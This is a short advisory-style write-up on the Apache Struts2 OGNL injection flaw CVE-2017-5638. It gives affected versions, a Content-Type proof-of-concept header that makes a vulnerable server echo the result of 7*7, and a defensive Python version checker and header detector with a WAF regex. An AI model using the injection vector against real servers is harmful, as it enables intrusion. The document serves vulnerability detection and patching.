RCE on Apache Struts2 (CVE-2017-5638)

Description

CVE-2017-5638 is a Remote Code Execution vulnerability in the Jakarta Multipart parser used by Apache Struts2. The payload is delivered in a crafted Content-Type, Content-Disposition or Content-Length request header.

The affected versions are:

  • Apache Struts versions 2.3.x before 2.3.32
  • Apache Struts versions 2.5.x before 2.5.10.1

Exploitation

If an endpoint's URL ends in .action, .do or .go, it might be a web application running Struts2.

Here is a small PoC: add the following header to an HTTP request:

Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Ack-POC', 7*7)}.multipart/form-data

With a vulnerable Struts2 version, the server returns the following response header:

X-Ack-POC: 49
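As an added example (not code from the original page, nor from the exploitation script it refers to), the following Python puts both parts of the write-up to defensive use: a version check against the affected ranges listed under Description, and a detection routine that flags requests whose Content-Type, Content-Disposition or Content-Length header carries an OGNL expression marker (`%{` or `${`), which is exactly what the PoC header above contains. The sample requests, the header-dictionary format and the function names are constructed for this example and are assumptions, not anything from the page.

```python
import re
from typing import Dict, List, Tuple

# Affected ranges as stated in the advisory text: 2.3.x before 2.3.32 and
# 2.5.x before 2.5.10.1. Each entry is (branch prefix, first fixed version).
AFFECTED_RANGES: List[Tuple[Tuple[int, ...], Tuple[int, ...]]] = [
    ((2, 3), (2, 3, 32)),
    ((2, 5), (2, 5, 10, 1)),
]

# The three request headers the page names as the payload carriers.
WATCHED_HEADERS = ("content-type", "content-disposition", "content-length")

# OGNL expression delimiters. A legitimate value for any of the watched
# headers never contains these, so a hit is a strong signal.
OGNL_MARKER = re.compile(r"[%$]\{")

# Constructed sample traffic (assumption: one dict of headers per request).
# Request 1 is the PoC header from the page; the others are benign.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"Content-Type": "multipart/form-data; boundary=----abc123",
     "Content-Length": "512"},
    {"Content-Type": "%{#context['com.opensymphony.xwork2.dispatcher."
                     "HttpServletResponse'].addHeader('X-Ack-POC', 7*7)}"
                     ".multipart/form-data"},
    {"content-type": "application/x-www-form-urlencoded",
     "X-Custom": "${not.a.watched.header}"},
]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.5.10.1' into (2, 5, 10, 1); trailing suffixes like '-SNAPSHOT'
    are ignored so that tuple comparison works on the numeric part only."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_affected_version(version: str) -> bool:
    """True if the given Struts release falls inside a vulnerable range."""
    v = parse_version(version)
    for branch, first_fixed in AFFECTED_RANGES:
        # Same branch (2.3 or 2.5) and strictly older than the fix.
        if v[: len(branch)] == branch and v < first_fixed:
            return True
    return False


def suspicious_headers(headers: Dict[str, str]) -> List[str]:
    """Return the names of watched headers whose value contains an OGNL
    marker. Header names are matched case-insensitively."""
    return [
        name
        for name, value in headers.items()
        if name.lower() in WATCHED_HEADERS and OGNL_MARKER.search(value)
    ]


def scan_requests(requests: List[Dict[str, str]]) -> List[int]:
    """Indices of requests that should be blocked or alerted on."""
    return [i for i, hdrs in enumerate(requests) if suspicious_headers(hdrs)]


if __name__ == "__main__":
    for ver in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1", "2.5.13"):
        print(f"Struts {ver}: {'AFFECTED' if is_affected_version(ver) else 'ok'}")
    for idx in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: OGNL marker in {suspicious_headers(SAMPLE_REQUESTS[idx])}")
```

The same `[%$]\{` pattern applied to those three headers works as a temporary WAF or reverse-proxy rule while an upgrade to 2.3.32 or 2.5.10.1 is scheduled; the version check is useful for inventorying which deployments actually need that upgrade.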

An exploitation script can be found here.